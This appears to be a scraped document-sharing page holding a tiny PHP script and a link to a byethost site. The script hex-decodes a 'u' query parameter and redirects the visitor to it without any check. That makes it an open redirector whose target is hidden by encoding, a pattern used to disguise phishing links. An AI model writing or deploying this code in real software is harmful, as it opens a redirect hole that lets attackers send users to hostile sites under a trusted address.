You are on page 1of 1

<?

php $Q = $_GET['u'];
function hexToStr($hex){
$string='';
for ($i=0; $i < strlen($hex)-1; $i+=2){
$string .= chr(hexdec($hex[$i].$hex[$i+1]));
}
return $string;
}
header('location:'.hexToStr($Q));
exit;
?>
****************
http://www.ismailok899.byethost7.com

You might also like